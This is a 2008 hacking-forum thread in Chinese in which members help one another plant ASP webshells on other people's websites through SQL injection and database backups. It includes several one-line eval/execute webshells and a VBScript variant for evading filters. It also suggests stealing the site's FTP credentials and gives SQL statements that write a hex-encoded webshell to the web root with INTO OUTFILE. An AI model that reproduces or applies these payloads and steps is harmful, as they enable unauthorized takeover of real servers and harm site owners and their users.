Board logo

标题: [讨论]数据库过大导致bak出的小马也太大,从而导致无法连接,有什么好办法? [打印本页]

作者: 虚竹    时间: 2008-7-21 00:20     标题: [讨论]数据库过大导致bak出的小马也太大,从而导致无法连接,有什么好办法?

[讨论]数据库过大导致bak出的小马也太大,从而导致无法连接,有什么好办法?
文章作者:redbin

信息来源:邪恶八进制信息安全团队(www.eviloctal.com


数据库过大导致bak出的小马也太大,从而导致无法连接,有什么好办法?

<%eval(request("a")):response.end%>
<%eval(request("a"))%>
<%execute request("a")%>
全部尝试过
用那个结束语句也不可以,每次都drop掉一下新BAK,
测试过BAK成txt  下回来有9M多,改成ASP放自己服务器测试下确实由于过大,而且屏蔽了错误返回信息,从而导致连接不上!不知道各位有什么高见可以让BAK出的小一些呢?小了肯定就可以访问了,或者有什么方法可以能让可以连上即可!



ps:可以列目录但是找不到后台,已经手工测试了那个所谓的后台目录近百个文件!

QQ 35475
作者: lx319    时间: 2008-7-21 00:20

其实不必备份整个数据库的.备份个别的表也行的.具体百度一下吧.鸟大了,什么林子都飞.
帖子12 精华0 积分25 阅读权限40 性别男 来自南方 在线时间6 小时 注册时间2008-4-6 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 软件项目外包

miao2
﹎'颓废小猫;

晶莹剔透§烈日灼然
作者: 枫枫    时间: 2008-7-21 00:20

log备份出来的马好象只有70几K
而且原先数据库中不能有 "<%" 字符,不然一样连接不上.
我就记得这些了

帖子26 精华2 积分89 阅读权限40 性别男 在线时间102 小时 注册时间2007-7-28 最后登录2008-7-19 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

remax
晶莹剔透§烈日灼然
作者: dahuzi3938    时间: 2008-7-21 00:20

差异。



备份。20字节够写什么?

帖子325 精华2 积分911 阅读权限50 在线时间79 小时 注册时间2005-10-25 最后登录2008-7-13 查看个人网站
查看详细资料引用 报告 回复 TOP

小胖子
Calm

晶莹剔透§烈日灼然
作者: isuzu12626    时间: 2008-7-21 00:20

看一下可不可以跨库,备份别的库试一下。上次我上网查资料,突然弹出来一个网页,很黄很暴力,我赶紧给关了。

帖子191 精华2 积分494 阅读权限40 性别男 在线时间87 小时 注册时间2005-1-18 最后登录2008-7-20 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

blackpather
晶莹剔透§烈日灼然
作者: n煲    时间: 2008-7-21 00:20

貌似碰到过这样的问题,  “屏蔽了错误返回信息”这个在服务器上是他自己自定义错误。
“可以列目录但是找不到后台” 好像是把后台删了,他自己机登陆后台管理时再FTP上传。
看他用的DD 是开源的不? 运气好的话 把FTP 密码搞过来,替他上传后台文件。。。
那点不对请批评指正。。。越狱出来滴!

帖子8 精华0 积分33 阅读权限40 性别男 来自河南 在线时间25 小时 注册时间2007-5-29 最后登录2008-7-11 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

゛小︷帅!﹊
晶莹剔透§烈日灼然
作者: 旧化王    时间: 2008-7-21 00:20

NBSI快多了 。

%%被过滤的时候考虑下 <script language=vbscript runat=server>execute request("#")</script>



帖子58 精华0 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

poc
晶莹剔透§烈日灼然
作者: pat1110    时间: 2008-7-21 00:20

你们回复只有一个同学说到了点
备份一个表
其他的也不看看楼主是什么人
汗!
帖子31 精华0 积分90 阅读权限40 性别男 在线时间57 小时 注册时间2007-3-18 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

outstand
晶莹剔透§烈日灼然
作者: win    时间: 2008-7-21 00:20

导出一个表看看效果!
帖子5 精华0 积分6 阅读权限40 在线时间5 小时 注册时间2008-5-6 最后登录2008-5-27 查看详细资料引用 报告 回复 TOP

kof2008
晶莹剔透§烈日灼然
作者: XYFHID    时间: 2008-7-21 00:20

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(0x3C25657865637574652872657175657374282261222929253EDA);
select cmd from a into outfile 'X:\WEB\1.asp';
Drop TABLE IF EXISTS a;
0x3C25657865637574652872657175657374282261222929253EDA是LAKE的一句话,密码为a
在PHP环境里我成功过,不知道ASP怎么样
MS在注入点后执行的话要加个;
如果是字符型的话还要加多个点'
帖子2 精华0 积分7 阅读权限40 性别男 在线时间2 小时 注册时间2006-8-28 最后登录2008-6-8 查看详细资料引用 报告 回复 TOP

jacksatan
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2